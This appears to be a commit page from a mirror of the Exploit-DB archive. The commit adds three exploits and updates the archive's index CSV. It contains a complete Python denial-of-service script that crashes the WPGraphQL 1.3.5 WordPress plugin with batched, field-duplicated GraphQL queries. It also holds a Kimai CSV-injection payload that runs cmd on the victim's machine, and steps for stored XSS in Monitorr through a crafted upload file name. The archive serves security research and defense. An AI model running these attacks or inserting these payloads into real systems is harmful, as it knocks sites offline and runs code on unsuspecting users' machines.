bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-04-28

Browse source 
3 changes to exploits/shellcodes

WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
Kimai 1.14 - CSV Injection
Montiorr 1.7.6m - File Upload to XSS
This commit is contained in:
Offensive Security 2021-04-28 05:01:56 +00:00
parent 092f2f0697
commit 2dbd546dde
4 changed files with 103 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

55
exploits/php/dos/49807.py Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
# Author: Dolev Farhi
# Date: 2021-04-12
# Vendor Homepage: https://www.wpgraphql.com/
# Version: 1.3.5
# Tested on: Ubuntu
"""
This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
"""
import sys
import requests
def usage():
print('* WordPress GraphQL 1.3.5 Denial of Service *')
print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))
print('python {} http://site.com 10000 100'.format(sys.argv[0]))
sys.exit(1)
if len(sys.argv) < 4:
print('Missing arguments!')
usage()
def wpgql_exists():
try:
r = requests.post(WORDPRESS_URL, json='x')
if 'GraphQL' in r.json()['errors'][0]['message']:
return True
except:
pass
return False
# This PoC assumes graphql is located at index.php?graphql
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
FORCE_MULTIPLIER = int(sys.argv[2])
CHAINED_REQUESTS = int(sys.argv[3])
if wpgql_exists is False:
print('Could not identify GraphQL running at "/index.php?graphql"')
sys.exit(1)
queries = []
payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}
for _ in range(0, CHAINED_REQUESTS):
queries.append(query)
r = requests.post(WORDPRESS_URL, json=queries)
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
print('Response:', r.json())

20
exploits/php/webapps/49805.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Kimai 1.14 - CSV Injection
# Date: 26/04/2021
# Exploit Author: Mohammed Aloraimi
# Vendor Homepage: https://www.kimai.org/
# Software Link: https://github.com/kevinpapst/kimai2
# Version: 1.14 <https://github.com/kevinpapst/kimai2/releases/tag/1.14>
# Payload: @SUM(1+9)*cmd|' /C calc'!A0
# Tested on: Win10x64
# Proof Of Concept:
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
creating new timesheet in Kimai. By filling the Description field with malicious
payload, it will be mistreated while exporting to a CSV file.
To exploit this vulnerability:
1- Login as user.
2- Create new timesheet.
3- Fill the description with the malicious payload.
4- Save the timesheet.
5- Export it via CSV.
6- Open the CSV file, allow all popups and our payload is executed(calculator is opened).

25
exploits/php/webapps/49806.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: Montiorr 1.7.6m - File Upload to XSS
# Date: 25/4/2021
# Exploit Author: Ahmad Shakla
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Kali GNU/Linux 2020.2
# Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html
An attacker can preform an XSS attack via image upload
Steps :
1)Create a payload with the following format :
><img src=x onerror=alert("XSS")>.png
2) Install the database by going to the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php
3)Register for a new account on the server by going to the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register
4)Login with your credentials on the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php
5)Go to the following link and upload the payload :
https://monitorr.robyns-petshop.thm/settings.php#services-configuration

3
files_exploits.csv
View file

@ -6779,6 +6779,7 @@ id,file,description,date,author,type,platform,port
49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware,
49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple,
49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",2021-04-21,"Dolev Farhi",dos,multiple,
49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -43976,3 +43977,5 @@ id,file,description,date,author,type,platform,port
49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware,
49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,
49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",2021-04-26,nu11secur1ty,webapps,php,
49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",2021-04-27,"Mohammed Aloraimi",webapps,php,
49806,exploits/php/webapps/49806.txt,"Montiorr 1.7.6m - File Upload to XSS",2021-04-27,"Ahmad Shakla",webapps,php,

Can't render this file because it is too large.